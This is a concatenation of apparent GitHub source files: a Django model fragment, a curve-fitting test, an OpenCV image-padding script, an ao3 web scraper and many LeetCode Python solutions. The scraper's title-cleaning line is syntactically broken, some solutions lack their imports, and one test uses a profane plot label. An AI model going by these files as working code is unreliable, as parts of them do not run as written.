return self.title
def get_absolute_url(self):
return reverse('myblog:article', kwargs={'pk': self.pk})
``` |
{
"source": "610yilingliu/excel-like-python-curve-fitter",
"score": 3
} |
#### File: excel-like-python-curve-fitter/test/test_runner.py
```python
import unittest
from pygrapher.runner import *
import matplotlib.pyplot as plt
class TestRunner(unittest.TestCase):
# def test_linear_fitter(self):
# x_array = [1, 2, 22, 3, 4]
# y_array = [1, 2, 3.5, 4.7777, 5]
# point_range = [0, 10]
# linear_fitter(x_array = x_array, y_origin = y_array, range = point_range, line_color = 'red', point_color = 'blue', label = 'fuck', point_label = 'point')
def test_poly_fitter(self):
x_array = [1, 2, 3, 4, 6]
y_array = [3, 6, 7, 5, 2]
point_range = [0, 20]
poly_fitter(3, x_array = x_array, y_origin = y_array, range = point_range, line_color = 'red', point_color = 'blue', label = 'fuck', point_label = 'point')
poly_fitter(2, x_array, y_array, point_range)
plt.show()
def test_exp_fitter(self):
x_array = [1, 2, 3, 4, 5]
y_array = [3, 4, 5, 7, 6]
point_range = [0, 20]
exp_fitter(x_array, y_array, point_range, e_base = False, param = True)
exp_fitter(x_array, y_array, point_range)
plt.show()
# def test_log_fitter(self):
# x_array = [1, 2, 3, 4, 5, 7]
# y_array = [2, 6, 3, 7, 2, 5]
# point_range = [0, 100]
# log_fitter(x_array, y_array, point_range)
``` |
{
"source": "610yilingliu/GenerateHouseNumber",
"score": 3
} |
#### File: 610yilingliu/GenerateHouseNumber/regularize_image.py
```python
import cv2
import os
import numpy as np
def regularize_img(path, dest, size):
"""
:type path: String, image path
    :type dest: String, destination path
:type size: Tuple, (height, width)
"""
img = cv2.imread(path)
h = img.shape[0]
l = img.shape[1]
    # If the length-to-height ratio is too large, resizing would deform the image, so pad it onto a square white background first.
    # The same applies below when the height-to-length ratio is too large.
if l > 1.3 * h:
bkg_size = l
        # Adding 255 turns the np.zeros (black) canvas into a white background.
        # If that is confusing, note that (0, 0, 0) is black and (255, 255, 255) is white.
blank_img = np.zeros((bkg_size, bkg_size, 3)) + 255
start = (l - h)//2
blank_img[start:start + h, :] = img[:, :]
img = blank_img
elif h > 1.3 * l:
bkg_size = h
blank_img = np.zeros((bkg_size, bkg_size, 3)) + 255
start = (h - l) // 2
blank_img[:, start:start + l] = img[:, :]
img = blank_img
res = cv2.resize(img, size)
cv2.imwrite(dest, res)
def make_gray(path, dest):
"""
:type path: String, image path
    :type dest: String, destination path
"""
img = cv2.imread(path)
img_gray = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
cv2.imwrite(dest, img_gray)
if __name__ == '__main__':
root = './raw_imgs/'
out = './imgs/'
files = os.listdir(root)
for f in files:
path = root + f
regularize_img(path, out + f, (32, 32))
outgray = './img_gray/'
files = os.listdir(out)
for f in files:
path = out + f
make_gray(path, outgray + f)
``` |
{
"source": "610yilingliu/Get-Ao3-Article",
"score": 3
} |
#### File: Get-Ao3-Article/pkg/article.py
```python
import requests
import re
def cleaner(text):
'''
Clean the html code
Variable type: text - String
'''
replace_dict = {
'<!--main content-->':'\n',
'<!--chapter content-->':'\n',
'<div class=\"userstuff module\" role=\"article\">': '',
'<div class=\"userstuff\">': '',
'<h3 class=\"landmark heading\" id=\"work\">':'',
'<div id=\"chapters\" role=\"article\">':'',
'</h3>': '\n',
'<p>':'',
'</p>': '\n',
'<br/>': '\n',
'<div>': '',
'</div>':'',
'<p dir=\"ltr\">':'',
'<blockquote class=\"userstuff\">': '',
'</blockquote>':'\n',
'<!-- end cache -->':'\n',
'<!--/main-->':'\n',
'<!--/chapter-->': '\n',
'<h3 class="heading">':'',
'<div class="notes module" role="complementary">':'',
'</a>':' ',
'<b>':'',
'</b>':'',
'<!--/descriptions-->': '\n',
'<p class=\"jump\">(See the end of the work for <a href=\"#work_endnotes\">more notes .)': '\n',
}
if text!= None:
for key in replace_dict.keys():
text = text.replace(key, replace_dict[key])
return text.strip()
else:
return None
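# Hedged usage sketch for cleaner() on an illustrative fragment (not real ao3 markup):
#   cleaner('<p>Hello</p><br/><div>world</div>')  ->  'Hello\n\nworld'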
class article(object):
'''
Get article page content
Variable type: url - String
'''
def __init__(self, url,
header = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
}):
req = requests.get(url, headers = header)
html = req.text
self.__html = html
self.__url = url
self.__header = header
def geturl(self):
'''
return url string
'''
return self.__url
def gethtml(self):
'''
return html string
'''
return self.__html
def gettitle(self):
'''
return title string
'''
html = self.__html
pattern = re.compile(r'<title>\n(.*)\n')
title = pattern.search(html).groups()[0]
# delete space
title = title.strip()
        title = title.replace(''', '\'')  # decode the HTML apostrophe entity
return title
def getauthor(self):
'''
return author string
'''
html = self.__html
pattern = re.compile(r'(?<=<a rel="author" href="\/users\/)(.*?)(?=<\/a>)')
mixed = pattern.search(html).groups()[0]
pattern2 = re.compile(r'(?<=\">)(.*)')
author = pattern2.search(mixed).groups()[0]
return author
def getchap(self):
'''
return chapter list
'''
html = self.__html
pattern = re.compile(r'<h3 class=\"title\">\s+<a href=.*>(.*?)</a>')
search_result = pattern.findall(html)
if search_result != []:
chapters = [cleaner(chapter) for chapter in search_result]
return chapters
return None
def getsummary(self):
'''
return summary list
'''
html = self.__html
pattern = re.compile(r'<h3 class=\"heading\">Summary\:<\/h3>([\s\S]*)<\/blockquote>')
search_result = pattern.findall(html)
if search_result !=[]:
summaries = [cleaner(summary) for summary in search_result]
return summaries
return None
def getnotes(self):
'''
return notes list
'''
html = self.__html
pattern = re.compile(r'<h3 class=\"heading\">Notes\:<\/h3>([\s\S]*?)<\/blockquote>')
search_result = pattern.findall(html)
if search_result!= []:
notes = [cleaner(note) for note in search_result]
return notes
return None
def getcontent(self):
'''
return content string
'''
html = self.__html
# not good enough.(?:<\!--main content-->|<\!--chapter content-->)[\s\S]*(?:<\!--\/chapter-->|<\!--\/main-->) works in regexr but does not work here
pattern1 = re.compile(r'<\!--chapter content-->([\s\S]*)<\!--\/main-->')
pattern2 = re.compile(r'<\!--chapter content-->([\s\S]*)<\!--\/chapter-->')
pattern3 = re.compile(r'<\!--main content-->([\s\S]*)<\!--\/chapter-->')
pattern4 = re.compile(r'<\!--main content-->([\s\S]*)<\!--\/main-->')
plist = [pattern1, pattern2, pattern3, pattern4]
for pattern in plist:
search_result = pattern.search(html)
if search_result != None:
content = search_result.groups()[0]
return cleaner(content)
else:
print('Page type not supported, please check if it is from ao3')
print(self.geturl())
input("Press enter to close program")
exit()
def get_related_chaps(self):
'''
return related chapters(list)
'''
html = self.__html
pattern = re.compile(r'(?<=a href=\")(.*)(?=\">Full-page index)')
res = re.search(pattern, html)
if res != None:
list_suffix = res.groups()[0]
chap_list_url = 'https://archiveofourown.org/' + list_suffix
list_html = requests.get(chap_list_url, headers = self.__header).text
article_pattern = re.compile(r'(?<=<li><a href=\"\/)works\/\d{1,}\/chapters\/\d{1,}(?=\")')
article_urls_suffix = re.findall(article_pattern, list_html)
article_urls = ['https://archiveofourown.org/' + url for url in article_urls_suffix]
return article_urls
return None
# if __name__ == '__main__':
# a = article('https://archiveofourown.org/works/22393369?view_adult=true?')
# re = a.get_related_chaps()
# print(re)
``` |
{
"source": "610yilingliu/leetcode",
"score": 3
} |
#### File: leetcode/Python3/1002.find-common-characters.py
```python
import collections
# @lc code=start
class Solution:
def commonChars(self, A: List[str]) -> List[str]:
if not A:
return []
if len(A) == 1:
return [char for char in A[0]]
pred = collections.Counter(A[0])
for i in range(1, len(A)):
curd = collections.Counter(A[i])
pred = self.findcommon(pred, curd)
ans = []
for k, v in pred.items():
for _ in range(v):
ans.append(k)
return ans
def findcommon(self, d1, d2):
rd = dict()
for k in d1:
if k in d2:
rd[k] = min(d1[k], d2[k])
return rd
# @lc code=end
```
#### File: leetcode/Python3/1015.smallest-integer-divisible-by-k.py
```python
class Solution(object):
def smallestRepunitDivByK(self, K):
if K % 2 == 0 or K % 5 == 0: return -1
rem, steps = 1, 1
while rem % K != 0:
rem = (rem*10 + 1) % K
steps += 1
return steps
# @lc code=end
```
#### File: leetcode/Python3/1022.sum-of-root-to-leaf-binary-numbers.py
```python
class Solution:
def sumRootToLeaf(self, root: TreeNode):
if not root:
return 0
self.bins = []
self.finder(root, '')
ans = 0
for item in self.bins:
cur = 0
digit = 0
while item:
cur += (int(item[-1]) & 1) * (1 << digit)
item = item[:-1]
digit += 1
ans += cur
return ans
def finder(self, root, path):
path = path + str(root.val)
if not root.left and not root.right:
self.bins.append(path)
return
if root.left:
self.finder(root.left, path)
if root.right:
self.finder(root.right, path)
# @lc code=end
```
#### File: leetcode/Python3/1035.uncrossed-lines.py
```python
class Solution:
def maxUncrossedLines(self, A: List[int], B: List[int]) -> int:
if not A or not B:
return 0
dp = [[0] * (len(A) + 1) for _ in range(len(B) + 1)]
for i in range(1, len(B) + 1):
for j in range(1, len(A) +1):
if B[i - 1] == A[j - 1]:
dp[i][j] = dp[i - 1][j - 1] + 1
else:
dp[i][j] = max(dp[i][j - 1], dp[i - 1][j])
return dp[-1][-1]
# @lc code=end
```
#### File: leetcode/Python3/1038.binary-search-tree-to-greater-sum-tree.py
```python
class Solution:
def bstToGst(self, root):
if not root:
return
self.ls = []
self.inorder(root)
def traveller(node):
if not node:
return
idx = self.ls.index(node.val)
new = sum(self.ls[idx:])
node.val = new
traveller(node.left)
traveller(node.right)
traveller(root)
return root
def inorder(self, root):
if not root:
return
self.inorder(root.left)
self.ls.append(root.val)
self.inorder(root.right)
# @lc code=end
```
#### File: leetcode/Python3/106.construct-binary-tree-from-inorder-and-postorder-traversal.py
```python
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def buildTree(self, inorder, postorder):
if not inorder or not postorder:
return None
node = TreeNode(postorder[-1])
inorder_idx = inorder.index(postorder[-1])
node.left = self.buildTree(inorder[:inorder_idx], postorder[:inorder_idx])
node.right = self.buildTree(inorder[inorder_idx + 1:], postorder[inorder_idx: len(postorder) - 1])
return node
if __name__ == '__main__':
a = Solution()
b = a.buildTree([9,3,15,20,7], [9,15,7,20,3])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/1099.two-sum-less-than-k.py
```python
class Solution:
def twoSumLessThanK(self, A, K):
A.sort()
if len(A) < 2 or A[0] + A[1] > K:
return -1
curmax = -1
for i in range(len(A) - 1, 0, -1):
for j in range(i - 1, -1, -1):
if A[i] > K:
continue
cursum = A[i] + A[j]
if cursum < K and cursum > curmax:
curmax = cursum
return curmax
# @lc code=end
```
#### File: leetcode/Python3/1115.print-foo-bar-alternately.py
```python
from threading import Lock
class FooBar:
def __init__(self, n):
self.n = n
self.fool = Lock()
self.barl = Lock()
self.barl.acquire()
def foo(self, printFoo: 'Callable[[], None]'):
for i in range(self.n):
# printFoo() outputs "foo". Do not change or remove this line.
self.fool.acquire()
printFoo()
self.barl.release()
def bar(self, printBar: 'Callable[[], None]'):
for i in range(self.n):
# printBar() outputs "bar". Do not change or remove this line.
self.barl.acquire()
printBar()
self.fool.release()
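# Hedged standalone driver (illustrative only; on LeetCode the judge supplies the
# printer callbacks and runs the two methods on separate threads):
if __name__ == '__main__':
    from threading import Thread
    fb = FooBar(2)
    t1 = Thread(target=fb.foo, args=(lambda: print('foo', end=''),))
    t2 = Thread(target=fb.bar, args=(lambda: print('bar', end=''),))
    t1.start(); t2.start()
    t1.join(); t2.join()
    print()  # expected output: foobarfoobar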
# @lc code=end
```
#### File: leetcode/Python3/114.flatten-binary-tree-to-linked-list.py
```python
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def flatten(self, root):
"""
Do not return anything, modify root in-place instead.
"""
if not root:
return
l = root.left
r = root.right
root.left = None
self.flatten(l)
self.flatten(r)
root.right = l
while root.right:
root = root.right
root.right = r
# def flatten(self, root):
# if not root:
# return
# ls = []
# def preorder(root):
# if not root:
# return
# ls.append(root)
# if root.left:
# preorder(root.left)
# if root.right:
# preorder(root.right)
# preorder(root)
# for i in range(len(ls) - 1):
# ls[i].left = None
# ls[i].right = ls[i + 1]
# return root
# @lc code=end
```
#### File: leetcode/Python3/116.populating-next-right-pointers-in-each-node.py
```python
class Node:
def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):
self.val = val
self.left = left
self.right = right
self.next = next
class Solution:
def connect(self, root: 'Node') -> 'Node':
if not root:
return None
count = 0
store = []
def generator(node, count):
if not node:
return
if count >= len(store):
store.append([])
store[count].append(node)
if node.left:
generator(node.left, count + 1)
if node.right:
generator(node.right, count + 1)
generator(root, count)
for item in store:
for i in range(len(item) - 1):
item[i].next = item[i + 1]
item[-1].next = None
return store[0][0]
# @lc code=end
```
#### File: leetcode/Python3/120.triangle.py
```python
class Solution:
def minimumTotal(self, triangle):
if len(triangle) == 1:
return triangle[0][0]
s = 0
start_x = 0
size = len(triangle)
mat = [[0] * (size) for _ in range(size)]
mat[0][0] = triangle[0][0]
# adjacent: next[idx] = prev[idx] or prev[idx + 1]
for i in range(1, size):
mat[i][0] = mat[i - 1][0] + triangle[i][0]
mat[i][i] = mat[i - 1][i - 1] + triangle[i][i]
for j in range(1, len(triangle[i]) - 1):
mat[i][j] = min(mat[i - 1][j - 1], mat[i - 1][j]) + triangle[i][j]
return min(mat[-1])
# @lc code=end
```
#### File: leetcode/Python3/122.best-time-to-buy-and-sell-stock-ii.py
```python
class Solution:
def maxProfit(self, prices):
if len(prices) < 2:
return 0
profit = 0
peak_pos = 0
velly_pos = 0
i = 0
while i < len(prices) - 1:
while i < len(prices) - 1 and prices[i] >= prices[i + 1]:
i += 1
velly_pos = i
while i < len(prices) - 1 and prices[i] <= prices[i + 1]:
i += 1
peak_pos = i
profit += prices[peak_pos] - prices[velly_pos]
return profit
if __name__ == '__main__':
a = Solution()
b = a.maxProfit([0,5,5,6,2,1,1,3])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/123.best-time-to-buy-and-sell-stock-iii.py
```python
import collections
# @lc code=start
class Solution:
def maxProfit(self, prices):
# if len(prices) < 2:
# return 0
# rg = len(prices)
# prof = [[0] * rg for _ in range(rg)]
# for i in range(rg):
# for j in range(rg):
# if i > j and prices[i] - prices[j] > 0:
# prof[i][j] = prices[i] - prices[j]
# maxprof = 0
# # start from mat[y][0]
# for x in range(0, rg - 1):
# for y in range(x + 1, rg):
# temp_prof = prof[y][x]
# x2 = y + 1
# maxprof = max(maxprof, temp_prof)
# if x2 < rg:
# while x2 < rg:
# for y2 in range(x2 + 1, rg):
# cur_val = prof[y2][x2]
# maxprof = max(maxprof, temp_prof + cur_val)
# x2 += 1
# return maxprof
# state: having a transaction or not
if len(prices) < 2:
return 0
dp = [[[0 for state in range(2)] for trans_did in range(3)] for day in range(len(prices))]
for t in range(3):
dp[0][t][0] = 0
dp[0][t][1] = -prices[0]
for p in range(1, len(prices)):
for i in range(1, 3):
dp[p][i][0] = max(dp[p - 1][i][0], dp[p - 1][i][1] + prices[p])
dp[p][i][1] = max(dp[p - 1][i][1], dp[p - 1][i - 1][0] - prices[p])
return dp[-1][-1][0]
if __name__ == '__main__':
a = Solution()
b = a.maxProfit([3,3,5,0,0,3,1,4])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/124.binary-tree-maximum-path-sum.py
```python
class Solution:
def maxPathSum(self, root: TreeNode):
self.mx = float('-inf')
self.traveller(root, 0)
return self.mx
def traveller(self, node, cursum):
if not node:
return cursum
cursum += node.val
l = 0
r = 0
if node.left:
l = self.traveller(node.left, cursum)
if node.right:
r = self.traveller(node.right, cursum)
        # self.mx: keep the original maximum value
# l + r + node.val: left sum + right sum + current val
# node.val: current val (if left sum < 0 and right sum < 0, use this one)
# l + node.val: left sum + current val
# r + node.val: right sum + current val
self.mx = max(self.mx, l + r + node.val, node.val, l + node.val, r + node.val)
return max(l + node.val, r + node.val, node.val)
# @lc code=end
```
#### File: leetcode/Python3/125.valid-palindrome.py
```python
class Solution:
def isPalindrome(self, s):
# lowercase = chr(ord(uppercase) - 32)
# lower: 97-122
# upper: 65-90
# 0-9: 48 - 57
l = 0
r = len(s) - 1
s = list(s)
while l < r:
if s[l] == s[r]:
l += 1
r -= 1
elif (48 <= ord(s[l]) <= 57 or 97 <= ord(s[l]) <= 122) and (48 <= ord(s[r]) <= 57 or 97 <= ord(s[r]) <= 122) and s[l] != s[r]:
return False
else:
# not belong to letters
if ord(s[l]) < 48 or 57 < ord(s[l]) < 65 or 90 < ord(s[l]) < 97 or ord(s[l]) > 122:
l += 1
if ord(s[r]) < 48 or 57 < ord(s[r]) < 65 or 90 < ord(s[r]) < 97 or ord(s[r]) > 122:
r -= 1
if 65 <= ord(s[l]) <= 90:
s[l] = chr(ord(s[l]) + 32)
if 65 <= ord(s[r]) <= 90:
s[r] = chr(ord(s[r]) + 32)
return True
if __name__ == '__main__':
a = Solution()
b = a.isPalindrome("A man, a plan, a canal: Panama")
print(b)
# @lc code=end
```
#### File: leetcode/Python3/128.longest-consecutive-sequence.py
```python
import collections
class Solution:
def longestConsecutive(self, nums):
d = {}
mx = 0
for num in nums:
if num not in d:
left = d.get(num - 1, 0)
right = d.get(num + 1, 0)
l = left + right + 1
mx = max(mx, l)
for number in [num - left, num, num + right]:
d[number] = l
return mx
if __name__ == '__main__':
a = Solution()
b = a.longestConsecutive([4,0,-4,-2,2,5,2,0,-8,-8,-8,-8,-1,7,4,5,5,-4,6,6,-3])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/1306.jump-game-iii.py
```python
class Solution:
def canReach(self, arr: List[int], start: int) -> bool:
visited_pos = set()
def dfs(pos):
if pos >= len(arr):
return False
if pos < 0:
return False
if pos in visited_pos:
return
if arr[pos] == 0:
return True
visited_pos.add(pos)
left_pos = pos - arr[pos]
right_pos = pos + arr[pos]
if dfs(left_pos) or dfs(right_pos):
return True
return False
return dfs(start)
# @lc code=end
```
#### File: leetcode/Python3/132.palindrome-partitioning-ii.py
```python
class Solution:
def minCut(self, s):
if not s or len(s) == 1:
return 0
helper = [i for i in range(len(s) + 1)]
for i in range(len(s)):
for j in range(i):
if self.is_pa(s[j: i + 1]):
helper[i + 1] = min(helper[i + 1], helper[j] + 1)
helper[i + 1] = min(helper[i + 1], helper[i] + 1)
return helper[-1] - 1
def is_pa(self, string):
return string == string[::-1]
if __name__ == '__main__':
a = Solution()
b = a.minCut("aab")
print(b)
# @lc code=end
```
#### File: leetcode/Python3/133.clone-graph.py
```python
class Node:
def __init__(self, val = 0, neighbors = []):
self.val = val
self.neighbors = neighbors
class Solution:
def cloneGraph(self, node):
root = self.dfs(node, {})
return root
def dfs(self, node, d):
if not node:
return None
if node in d:
return d[node]
node_copy = Node(node.val, [])
d[node] = node_copy
for item in node.neighbors:
next_copy = self.dfs(item, d)
if next_copy:
node_copy.neighbors.append(next_copy)
return node_copy
# @lc code=end
```
#### File: leetcode/Python3/140.word-break-ii.py
```python
class Solution:
def wordBreak(self, s, wordDict):
# # O(2 ^ n)
# dp = [False] * (len(s) + 1)
# dp[0] = True
# words = wordDict
# result = []
# def backtracker(dp, path, start = 0):
# if dp[-1]:
# result.append(' '.join(path))
# for i in range(start + 1, len(dp)):
# cur = s[start:i]
# if cur in words:
# next_dp = dp.copy()
# next_dp[i] = True
# backtracker(next_dp, path + [cur], i)
# backtracker(dp, [])
# return result
if not s:
return []
def searcher(s, words, visited):
if s in visited:
return visited[s]
if not s:
return []
ans = []
for word in words:
if not s.startswith(word):
continue
if len(word) == len(s):
ans.append(word)
else:
res = searcher(s[len(word):], words, visited)
for item in res:
item = word + ' ' + item
ans.append(item)
visited[s] = ans
return ans
return searcher(s, wordDict, {})
if __name__ == '__main__':
a = Solution()
b = a.wordBreak("catsanddog",["cat", "cats", "and", "sand", "dog"])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/15.3-sum.py
```python
class Solution:
def threeSum(self, nums):
l = len(nums)
if l < 3:
return []
sol = []
nums.sort()
for i in range(l - 2):
if nums[i] + nums[i + 1] + nums[i + 2] > 0:
break
if nums[i] + nums[l - 1] + nums[l - 2] < 0:
continue
if i > 0 and nums[i] == nums[i - 1]:
continue
mid = i + 1
right = l - 1
while mid < right:
tmp = nums[i] + nums[mid] + nums[right]
if tmp == 0:
sol.append([nums[i], nums[mid], nums[right]])
while mid + 1 < right and nums[mid] == nums[mid + 1]:
mid = mid + 1
mid = mid + 1
while mid < right - 1 and nums[right] == nums[right - 1]:
right = right - 1
right = right - 1
elif tmp > 0:
right = right -1
else:
mid = mid + 1
return sol
if __name__ == '__main__':
a = Solution()
b = a.threeSum([-1,0,1,2,-1,-4])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/159.longest-substring-with-at-most-two-distinct-characters.py
```python
import collections
class Solution:
def lengthOfLongestSubstringTwoDistinct(self, s):
"""
:type s: String
:rtype: int
"""
mxlen = 0
lp, rp = 0, 0
tool_dict = collections.defaultdict(int)
tool_set = set()
while rp < len(s):
tool_dict[s[rp]] += 1
tool_set.add(s[rp])
if len(tool_set) > 2:
mxlen = max(mxlen, rp - lp)
while lp < rp and len(tool_set) > 2:
tool_dict[s[lp]] -= 1
if tool_dict[s[lp]] == 0:
tool_set.remove(s[lp])
lp += 1
rp += 1
mxlen = max(mxlen, rp - lp)
return mxlen
# @lc code=end
```
#### File: leetcode/Python3/161.one-edit-distance.py
```python
class Solution:
def isOneEditDistance(self, s: str, t: str):
if s == t:
return False
if abs(len(s) - len(t)) > 1:
return False
def repair(shorter, longer):
shorter = shorter + ' '
c = 0
for i in range(len(longer)):
if shorter[i]!= longer[i]:
if c > 0:
return False
shorter = shorter[:i] + longer[i] + shorter[i:]
c += 1
return True
if len(s) < len(t):
return repair(s, t)
if len(s) > len(t):
return repair(t, s)
counter = 0
for i in range(len(s)):
if s[i] != t[i]:
if counter > 0:
return False
counter += 1
return True
# if __name__ == '__main__':
# a = Solution()
# b = a.isOneEditDistance("a", '')
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/163.missing-ranges.py
```python
class Solution:
def findMissingRanges(self, nums: List[int], lower: int, upper: int):
if not nums:
if lower == upper:
return [str(lower)]
return [str(lower) + '->' + str(upper)]
if nums[0] == upper == lower:
return []
ans = []
if nums[0] > lower:
if nums[0] - lower == 1:
ans.append(str(lower))
else:
ans.append(str(lower) + '->' + str(nums[0] - 1))
for i in range(1, len(nums)):
if nums[i] - nums[i - 1] == 1 or nums[i] == nums[i - 1]:
continue
if nums[i] - nums[i - 1] == 2:
ans.append(str(nums[i - 1] + 1))
else:
ans.append(str(nums[i - 1] + 1) + '->' + str(nums[i] - 1))
if nums[-1] < upper:
if upper - nums[-1] == 1:
ans.append(str(upper))
else:
ans.append(str(nums[-1] + 1) + '->' + str(upper))
return ans
# @lc code=end
```
#### File: leetcode/Python3/168.excel-sheet-column-title.py
```python
class Solution:
def convertToTitle(self, n):
res = ''
while n:
num = (n - 1) % 26
res = chr(ord('A') + num) + res
n = (n - 1) // 26
return res
if __name__ == '__main__':
a = Solution()
b = a.convertToTitle(52)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/188.best-time-to-buy-and-sell-stock-iv.py
```python
import collections
# @lc code=start
class Solution:
def maxProfit(self, k, prices):
if len(prices) < 2:
return 0
if k > len(prices)//2:
return sum(i - j for i, j in zip(prices[1:], prices[:-1]) if i - j > 0)
dp = [[[0 for state in range(2)] for trans in range(k + 1)] for day in range(len(prices))]
for trans in range(k + 1):
dp[0][trans][0] = 0
dp[0][trans][1] = -prices[0]
for p in range(1, len(prices)):
for i in range(1, k + 1):
dp[p][i][0] = max(dp[p - 1][i][0], dp[p - 1][i][1] + prices[p])
dp[p][i][1] = max(dp[p - 1][i][1], dp[p - 1][i - 1][0] - prices[p])
return dp[-1][-1][0]
# if __name__ == '__main__':
# a = Solution()
# b = a.maxProfit(3, [3,3,5,0,0,3,1,4])
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/199.binary-tree-right-side-view.py
```python
class Solution:
def rightSideView(self, root):
if not root:
return []
storage = []
def traveller(root, level):
if len(storage) <= level:
storage.append([])
storage[level].append(root.val)
if root.left:
traveller(root.left, level + 1)
if root.right:
traveller(root.right, level + 1)
traveller(root, 0)
ans = []
for level in storage:
ans.append(level[-1])
return ans
# @lc code=end
```
#### File: leetcode/Python3/207.course-schedule.py
```python
import collections
# @lc code=start
class Solution:
def canFinish(self, numCourses, prerequisites):
child = collections.defaultdict(int)
parent = collections.defaultdict(set)
for item in prerequisites:
parent[item[1]].add(item[0])
child[item[0]] += 1
for i in range(numCourses):
has_zero = False
for item in range(numCourses):
if child[item] == 0:
has_zero = True
child[item] = -1
break
if not has_zero:
return False
for thing in parent[item]:
child[thing] -= 1
return True
# @lc code=end
```
#### File: leetcode/Python3/215.kth-largest-element-in-an-array.py
```python
class Solution:
def findKthLargest(self, nums: List[int], k: int):
counter = 0
while counter < k - 1:
nums.remove(max(nums))
counter += 1
return max(nums)
# @lc code=end
```
#### File: leetcode/Python3/216.combination-sum-iii.py
```python
class Solution:
def combinationSum3(self, k, n):
if k == 0 or n == 0:
return []
self.ans = []
self.k = k
self.back(n, 0, [])
return self.ans
def back(self, rest, count, path):
if rest == 0 and count == self.k:
self.ans.append(path)
if rest > (self.k - count) * 9:
return
if rest < self.k - count:
return
if rest < 0:
return
for i in range(1, 10):
if not path or (path and i > path[-1]):
self.back(rest - i, count + 1, path + [i])
if __name__ == '__main__':
a = Solution()
b = a.combinationSum3(3, 7)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/220.contains-duplicate-iii.py
```python
import collections
# @lc code=start
class Solution:
def containsNearbyAlmostDuplicate(self, nums, k, t):
if k < 0 or t < 0:
return False
if t == 0:
# if no duplicated number
if len(set(nums)) == len(nums):
return False
# else check index
else:
tempd = dict()
for idx, num in enumerate(nums):
if num not in tempd:
tempd[num] = idx
else:
if idx - tempd[num] <= k:
return True
tempd[num] = idx
return False
# if not equal to zero, do bucket sort
bucket = collections.OrderedDict()
b_size = t + 1
for num in nums:
key = num//b_size
if key in bucket:
return True
bucket[key] = num
if key - 1 in bucket and num - bucket[key - 1] <= t:
return True
if key + 1 in bucket and bucket[key + 1] - num <= t:
return True
# remove the first added key
if len(bucket) > k:
bucket.popitem(last = False)
return False
if __name__ == '__main__':
a = Solution()
b = a.containsNearbyAlmostDuplicate([1,2,3,4,5,1], 5, 0)
print(b)
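    # hedged extra check exercising the bucket path (t > 0); the input values are illustrative
    print(a.containsNearbyAlmostDuplicate([1, 5, 9, 1, 5, 9], 2, 3))  # expected: False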
# @lc code=end
```
#### File: leetcode/Python3/221.maximal-square.py
```python
class Solution():
def maximalSquare(self, matrix):
if not matrix: return 0
M = len(matrix)
N = len(matrix[0])
dp = [[0] * N for _ in range(M)]
for i in range(M):
dp[i][0] = int(matrix[i][0])
for j in range(N):
dp[0][j] = int(matrix[0][j])
for i in range(1, M):
for j in range(1, N):
if int(matrix[i][j]) == 1:
dp[i][j] = min(dp[i][j - 1], dp[i - 1][j], dp[i - 1][j - 1]) + 1
return max(map(max, dp)) ** 2
if __name__ == '__main__':
a = Solution()
b = a.maximalSquare([["0","0","0","1"],["1","1","0","1"],["1","1","1","1"],["0","1","1","1"],["0","1","1","1"]])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/224.basic-calculator.py
```python
class Solution(object):
def calculate(self, s):
"""
:type s: str
:rtype: int
"""
res, num, sign = 0, 0, 1
stack = []
for c in s:
if c.isdigit():
num = 10 * num + int(c)
elif c == "+" or c == "-":
res = res + sign * num
num = 0
sign = 1 if c == "+" else -1
elif c == "(":
stack.append(res)
stack.append(sign)
res = 0
sign = 1
elif c == ")":
res = res + sign * num
num = 0
res *= stack.pop()
res += stack.pop()
res = res + sign * num
return res
# @lc code=end
```
#### File: leetcode/Python3/229.majority-element-ii.py
```python
import collections
# @lc code=start
class Solution:
def majorityElement(self, nums):
if not nums:
return []
mi = len(nums)/3
d = collections.defaultdict(int)
ans = []
for item in nums:
if d[item] <= mi:
d[item] += 1
if item not in ans and d[item] > mi:
ans.append(item)
return ans
# @lc code=end
if __name__ == '__main__':
    a = Solution()
b = a.majorityElement([3,2,3])
print(b)
```
#### File: leetcode/Python3/233.number-of-digit-one.py
```python
class Solution:
def countDigitOne(self, n):
"""
:type n: int
:rtype: int
"""
if n<=0:
return 0
ln=len(str(n))
if ln==1:
return 1
tmp1=10**(ln-1)
firstnum=n//tmp1
Fone = n%tmp1+1 if firstnum==1 else tmp1
other = firstnum*(ln-1)*(tmp1//10)
return Fone + other + self.countDigitOne(n % tmp1)
# @lc code=end
```
#### File: leetcode/Python3/243.shortest-word-distance.py
```python
class Solution:
def shortestDistance(self, words, word1, word2):
d = {word1: -1, word2: -1}
mi = float('inf')
if word1 == word2:
return
for i in range(len(words)):
if words[i] == word1:
d[word1] = i
if d[word2] != -1:
mi = min(abs(d[word1] - d[word2]), mi)
elif words[i] == word2:
d[word2] = i
if d[word1] != -1:
mi = min(abs(d[word1] - d[word2]), mi)
return mi
# @lc code=end
```
#### File: leetcode/Python3/247.strobogrammatic-number-ii.py
```python
import collections
# @lc code=start
class Solution:
d = {'0':'0', '1':'1', '6':'9', '8':'8', '9':'6'}
def findStrobogrammatic(self, n):
return self.helper(n, n)
def helper(self, n, k):
if k == 0:
return ['']
if k == 1:
return ['0', '1', '8']
res = []
for num in self.helper(n, k - 2):
for key, val in self.d.items():
if n != k or key != '0':
res.append(key + num + val)
return res
if __name__ == '__main__':
a = Solution()
b = a.findStrobogrammatic(6)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/250.count-univalue-subtrees.py
```python
class Solution:
def countUnivalSubtrees(self, root: TreeNode):
self.ans = 0
self.finder(root)
return self.ans
def finder(self, root):
if not root:
return True
